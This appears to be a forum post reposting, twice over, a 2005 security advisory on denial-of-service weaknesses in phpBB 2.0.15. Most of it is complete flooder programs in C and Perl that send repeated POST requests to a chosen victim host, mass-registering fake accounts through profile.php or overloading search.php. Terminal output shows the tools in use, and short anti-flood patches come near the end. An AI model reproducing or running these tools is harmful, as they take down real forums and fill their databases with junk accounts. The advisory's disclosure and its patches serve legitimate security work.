Autor
Código:
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06
--------------------------------------------------------
Program: phpBB 2.0.15
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.15 & Lower versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.
-==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
- Tested
---------------------------------------------------------
localhost & many forums
- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can.
search.php << by searching in a way that the db couln't observe it.
- Exploit
---------------------------------------------------------
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD
root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
[*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
.................................
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define __USE_GNU
#define _XOPEN_SOURCE
int Connection(char *, int);
void Write_In(int , char *, char *a, char *, int);
char Use(char *);
int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
puts("[+] NeoSecurityTeam");
puts("[+] Dos has begun....[+]\n");
fflush(stdout);
if(argc != 4) Use(argv[0]);
while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)
return 0;
}
int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);
if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!\n");
return;
}
#endif
SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;
if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number\n");
fflush(stdout);
exit(-1);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}
if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);
if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}
return sockfd;
}
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
"Accept: */*\r\n"
"Accept-Language: en-us\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Accept encoding: gzip,deflate\r\n"
"Keep-Alive: 300\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Cache-Control: no-cache\r\n"
"Pragma: no-cache\r\n";
char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";
if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Hack%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}
sprintf(str2, "POST %s%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Referer: http://%s/\r\n%s"
"Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}
char Use(char *program)
{
fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
fflush(stdout);
exit(-1);
}
/*
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
*************************************************************************
[Perl Source]
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
- Solutions
--------------------------------------------------------
/* Patch by Paisterist. Put this code after the "// Get current date" line */
phpBB2/includes/usercp_register.php
-usercp_register.php-
###
$flood=time()-120;
$query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "' order by user_regdate desc");
if($db->sql_numrows($query)!=0)
{
$row=$db->sql_fetchrow($query);
$error=TRUE;
$error_msg="Protección anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos y manda los datos de vuelta.";
}
else
{
-usercp_register.php-
===================================
/* Patch by Paisterist. Put this code after "// Define initial vars" */
phpBB2/search.php
-search.php-
if ($_GET['mode']=="results")
{
############
$fp=fopen("time.txt", "r");
$flood=fgets($fp, 1000);
if($flood>=time()-5)
{
message_die(GENERAL_MESSAGE, "Protección anti flood activada. Intenta unos segundos más tarde");
fclose($fp);
exit(0);
}
else
{
$fp=fopen("time.txt", "w");
fwrite($fp, time());
fclose($fp);
}
######
-search.php-
- References
--------------------------------------------------------
http://www.neosecurityteam.net/Advisories/Advisory-15.txt
- Credits
-------------------------------------------------
[C Exploit] by HaCkZaTaN <hck_zatan@hotmail.com>
[Perl Exploit] by g30rg3_x <g30rg3x@chxsecurity.org>
[Patch] by Paisterist <paisterist@neosecurityteam.net>
[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/
Got Questions? http://www.neosecurityteam.net/
Irc.gigachat.net #uruguay [NeoSecurity IRC]
- Greets
--------------------------------------------------------
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
T0wn3r
All Internal Fear Staff
Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06
--------------------------------------------------------
Program: phpBB 2.0.15
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.15 & Lower versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.
-==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
- Tested
---------------------------------------------------------
localhost & many forums
- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can.
search.php << by searching in a way that the db couln't observe it.
- Exploit
---------------------------------------------------------
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD
root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
[*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
.................................
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define __USE_GNU
#define _XOPEN_SOURCE
int Connection(char *, int);
void Write_In(int , char *, char *a, char *, int);
char Use(char *);
int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
puts("[+] NeoSecurityTeam");
puts("[+] Dos has begun....[+]\n");
fflush(stdout);
if(argc != 4) Use(argv[0]);
while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)
return 0;
}
int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);
if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!\n");
return;
}
#endif
SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;
if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number\n");
fflush(stdout);
exit(-1);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}
if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);
if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}
return sockfd;
}
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
"Accept: */*\r\n"
"Accept-Language: en-us\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Accept encoding: gzip,deflate\r\n"
"Keep-Alive: 300\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Cache-Control: no-cache\r\n"
"Pragma: no-cache\r\n";
char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";
if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Hack%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}
sprintf(str2, "POST %s%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Referer: http://%s/\r\n%s"
"Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}
char Use(char *program)
{
fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
fflush(stdout);
exit(-1);
}
/*
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
*************************************************************************
[Perl Source]
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
- Solutions
--------------------------------------------------------
/* Patch by Paisterist. Put this code after the "// Get current date" line */
phpBB2/includes/usercp_register.php
-usercp_register.php-
###
$flood=time()-120;
$query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "' order by user_regdate desc");
if($db->sql_numrows($query)!=0)
{
$row=$db->sql_fetchrow($query);
$error=TRUE;
$error_msg="Protección anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos y manda los datos de vuelta.";
}
else
{
-usercp_register.php-
===================================
/* Patch by Paisterist. Put this code after "// Define initial vars" */
phpBB2/search.php
-search.php-
if ($_GET['mode']=="results")
{
############
$fp=fopen("time.txt", "r");
$flood=fgets($fp, 1000);
if($flood>=time()-5)
{
message_die(GENERAL_MESSAGE, "Protección anti flood activada. Intenta unos segundos más tarde");
fclose($fp);
exit(0);
}
else
{
$fp=fopen("time.txt", "w");
fwrite($fp, time());
fclose($fp);
}
######
-search.php-
- References
--------------------------------------------------------
http://www.neosecurityteam.net/Advisories/Advisory-15.txt
- Credits
-------------------------------------------------
[C Exploit] by HaCkZaTaN <hck_zatan@hotmail.com>
[Perl Exploit] by g30rg3_x <g30rg3x@chxsecurity.org>
[Patch] by Paisterist <paisterist@neosecurityteam.net>
[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/
Got Questions? http://www.neosecurityteam.net/
Irc.gigachat.net #uruguay [NeoSecurity IRC]
- Greets
--------------------------------------------------------
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
T0wn3r
All Internal Fear Staff
Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
Aqui pueden verlos tambien en:
http://packetstorm.linuxsecurity.com/0506-exploits/NsT-phpBBDoS.c
http://packetstorm.linuxsecurity.com/0506-exploits/NsT-phpBBDoS.pl.txt
Salu2!!
En línea
